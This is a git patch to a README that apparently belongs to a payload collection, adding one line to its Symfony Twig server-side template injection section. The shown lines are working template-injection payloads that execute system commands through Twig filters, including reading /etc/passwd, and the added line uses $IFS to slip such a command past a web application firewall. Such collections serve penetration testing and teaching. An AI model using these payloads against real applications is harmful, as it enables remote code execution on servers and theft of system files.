From 38c273ff00da234058b477275826323af3429a58 Mon Sep 17 00:00:00 2001
From: SakiiR SakiiR
Date: Sun, 29 Mar 2020 23:23:26 +0200
Subject: [PATCH] Added IFS (WAF bypass) to Symfony Twig RCE
---
 Server Side Template Injection/README.md | 1 +
 1 file changed, 1 insertion(+)
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 9bf3241..9fc9ac5 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -159,6 +159,7 @@ $output = $twig > render (
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
 ```

 Example with an email passing FILTER_VALIDATE_EMAIL PHP.